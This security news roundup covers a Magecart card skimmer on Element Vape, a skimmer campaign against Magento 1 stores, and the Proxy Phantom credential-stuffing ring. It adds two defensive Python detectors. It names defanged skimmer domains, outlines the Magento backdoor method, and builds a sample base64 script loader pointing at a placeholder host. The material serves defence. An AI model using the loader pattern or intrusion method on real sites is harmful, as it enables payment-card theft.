
Credit Cards Were Forged from a Prominent e-Cigarette Store

 

Element Vape, a well-known online retailer of e-cigarettes and vaping kits, has been breached and is serving a credit card skimmer from its website. The retailer sells e-cigarettes, vaping equipment, e-liquids, and synthetic drugs through both retail and online storefronts in the United States and Canada.

The Element Vape website is loading a potentially malicious file from a third-party website, and the file appears to be a credit card stealer. Magecart refers to threat actors who plant credit card skimmers on eCommerce sites by injecting scripts.

On numerous shop webpages, beginning with the homepage, an unexplained base64-encoded script can be seen on lines 45-50 of the HTML source code. The malicious code has been present on ElementVape.com for an unknown period of time.

According to a Wayback Machine review of ElementVape.com, this code was absent as of February 5th, 2022, and earlier. The infection therefore appears to be more recent, occurring sometime after that date and before today's detection. When decoded, the script simply fetches the following JavaScript file from a third-party site:

/weicowire[.]com/js/jquery/frontend.js

Once this script was decoded and examined, its purpose was apparent: collecting credit card and billing information from customers during checkout. The script looks for email addresses, payment card details, phone numbers, and billing addresses (including street and ZIP codes).

The attacker receives these details via a predefined Telegram address that is disguised in the script. The code also has anti-reverse-engineering features that check whether it is being run in a sandbox or with "devtools" open, to prevent it from being examined.
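For store operators who want to check their own pages for the pattern described above (an inline script whose remote source is only visible after base64 decoding), the following is an added example and not code from the article or from the skimmer. The hostnames `shop.example.com` and `static.example.net` and the sample page are constructed placeholders.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # long base64-looking literal
URL_REF = re.compile(r"(?:https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s'\"]*")

class InlineScripts(HTMLParser):
    """Collects the bodies of <script> elements that have no src attribute."""
    def __init__(self):
        super().__init__()
        self.bodies, self._inline = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script" and "src" not in dict(attrs):
            self._inline = True
            self.bodies.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._inline = False
    def handle_data(self, data):
        if self._inline:
            self.bodies[-1] += data

def hidden_remote_hosts(html, allowed_hosts):
    """Return (host, url) pairs for URLs that appear only after base64-decoding
    a literal in an inline script and whose host is not on the allowlist."""
    parser = InlineScripts()
    parser.feed(html)
    findings = []
    for body in parser.bodies:
        for run in B64_RUN.findall(body):
            try:
                text = base64.b64decode(run + "=" * (-len(run) % 4)).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64, or not text: ignore
            for url in URL_REF.findall(text):
                host = (urlparse(url).hostname or "").lower()
                if not any(host == a or host.endswith("." + a) for a in allowed_hosts):
                    findings.append((host, url))
    return findings

# Constructed sample page; both hostnames are placeholders, not values from the article.
_encoded = base64.b64encode(b"//static.example.net/js/jquery/frontend.js").decode()
SAMPLE_HTML = (
    '<html><head><script src="https://shop.example.com/js/app.js"></script>\n'
    "<script>var s=document.createElement('script');"
    f"s.src=atob('{_encoded}');document.head.appendChild(s);</script></head></html>"
)
```

Running `hidden_remote_hosts(SAMPLE_HTML, {"shop.example.com"})` reports the encoded third-party host; a finding is a prompt for manual review, since legitimate scripts also embed base64.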

It's unclear how the backend code of ElementVape.com was altered in the first place to allow the malicious script to enter. Reportedly, this isn't the first time Element Vape's security has been breached. Users reported getting letters from Element Vape in 2018 indicating the company had a data breach and that the "window of penetration between December 6, 2017, and June 27, 2018, might have revealed users' personal details" to threat actors.

Several Magento Sites were Targeted by a Surge of MageCart Attacks

 

A large number of online stores using the Magento 1 e-commerce system were targeted by a web skimmer, according to Sansec, an eCommerce security consultancy. 

Sansec's crawler detected roughly 374 infections in a single day, indicating a mass attack. The malware was loaded from the domain naturalfreshmall[.]com, which is presently offline. The threat operators' purpose was to steal credit card information from customers of the targeted online retailers.

Attackers often use a security flaw in the Quickview plugin as the initial intrusion vector, inserting rogue admin users into susceptible Magento stores. In this case, however, the flaw was exploited to add a default value that results in the database being updated with a file carrying a simple backdoor. Simply browsing to the Magento login page causes the validation requirements for prospective customers to be evaluated, which triggers the code execution.

The abuse works by adding a default value to the customer_eav_attribute table. The host application is tricked into creating a malicious entity, which is then used to generate a basic backdoor (api 1.php). According to Sansec, the intruders installed 19 backdoors on the hacked system, which means affected sites must remove all of them to avoid being targeted in future attacks.

Although thousands of merchants continue to use it, the Magento 1 platform has reached End-of-Life, and Adobe no longer provides security updates for it. As a result, these sites are exposed to a wide range of cyberattacks, putting customers' sensitive information at risk. These details usually include credit card numbers, mailing addresses, names, phone numbers, and email addresses, as well as anything else required to complete an online order.

All Magento administrators should make sure they are running the most current edition of the platform and upgrade if they are on an older, unsupported version.

Proxy Phantom Employs Automated Credential Stuffing Technique to Target Online Retailers

 

Cybersecurity researchers have exposed a massive fraud operation that targets e-commerce companies in account takeover attacks. 

Sift, a fraud prevention firm, announced on Thursday that the hacker ring, dubbed Proxy Phantom, is using over 1.5 million sets of stolen account credentials in automated credential stuffing attacks against online retailers.

Credential stuffing attacks usually depend on a large number of stolen or leaked credentials (username and password pairs) from one website, which are then tested on the login pages of other websites. The attacker's motive is to gain unauthorized access to as many user accounts as possible and then carry out other attacks or fraudulent schemes.

Sift's researchers estimate that only 0.1% of credential stuffing attempts succeed. Despite that low success rate, an attacker can try thousands of account combinations at the same time, so these attacks can still be useful, particularly when employed against businesses or financial services.

Proxy Phantom “flooded businesses with bot-based login attempts to conduct as many as 2,691 login attempts per second,” as per Sift's Q3 2021 Digital Trust & Safety Index. The scammers also used connected and rotating IP addresses to make the requests appear to come from different geographical areas, and they primarily targeted e-commerce platforms and online services.

"As a result, targeted merchants using rules-based fraud prevention methods would be forced to play a supercharged, global game of 'whack-a-mole,' with new combinations of IP addresses and credentials (likely purchased in bulk on the dark web) coming for them at an unthinkable pace," Sift stated.
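To illustrate why a per-IP rule turns into the "whack-a-mole" described above while an aggregate view of the login stream does not, here is an added detection example that is not from Sift's report. The thresholds, the event tuple layout `(timestamp, ip, username, success)` and the sample traffic are all constructed assumptions; the burst uses the 0.1% success rate quoted earlier.

```python
from collections import Counter, defaultdict

def per_ip_rule(events, max_failures=5):
    """Rules-based control: flag an IP once it exceeds max_failures failed logins."""
    failures = Counter(ip for _, ip, _, ok in events if not ok)
    return {ip for ip, n in failures.items() if n > max_failures}

def stuffing_windows(events, window_s=60, min_attempts=100,
                     min_fail_ratio=0.95, min_user_spread=0.9):
    """Flag time windows that look like credential stuffing regardless of source IP:
    many attempts, nearly all failing, almost every attempt a different username."""
    buckets = defaultdict(list)
    for ts, ip, user, ok in events:
        buckets[ts // window_s * window_s].append((ip, user, ok))
    flagged = []
    for start in sorted(buckets):
        rows = buckets[start]
        attempts = len(rows)
        fail_ratio = sum(1 for _, _, ok in rows if not ok) / attempts
        user_spread = len({user for _, user, _ in rows}) / attempts
        if (attempts >= min_attempts and fail_ratio >= min_fail_ratio
                and user_spread >= min_user_spread):
            flagged.append({"window_start": start, "attempts": attempts,
                            "source_ips": len({ip for ip, _, _ in rows}),
                            "fail_ratio": round(fail_ratio, 3)})
    return flagged

def build_sample():
    """Constructed events: 20 normal logins, then a burst spread over rotating IPs."""
    events = [(i * 3, f"198.51.100.{i}", f"customer{i}", True) for i in range(20)]
    for i in range(1000):  # 250 IPs x 4 attempts each, 1 success out of 1000 (0.1%)
        events.append((120 + i % 60, f"203.0.113.{i % 250}", f"leaked{i}", i == 500))
    return events

if __name__ == "__main__":
    sample = build_sample()
    print("per-IP rule flags:", per_ip_rule(sample))
    print("window signal flags:", stuffing_windows(sample))
```

On the constructed traffic the per-IP rule flags nothing because no address exceeds four failures, while the window signal flags the burst as a whole.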

The study further reports that account takeover attacks identified by the company jumped by 307% over Q3. Specifically, the financial sector is a top target, including cryptocurrency exchanges and digital wallet services. 

Earlier this month, Netacea, a UK-based software firm, released an index documenting the activity of scalper bots. These automated systems are built to beat online queues for high-ticket products such as concert tickets and gaming consoles so that their operators can resell them at a profit.

“Fraudsters will never stop adapting their techniques to overwhelm traditional fraud prevention, making suspicious logins look legitimate, and legitimate ones look suspicious. At the same time, poor consumer security habits—like reusing passwords for multiple accounts—make it easy and continue to breathe life into the fraud economy,” stated Jane Lee, trust and safety architect at Sift.

“To proactively secure customer accounts and fuel expansion into new markets, merchants need to adopt a Digital Trust & Safety strategy to stop these advanced attacks before they shatter consumer loyalty and stifle growth,” she added.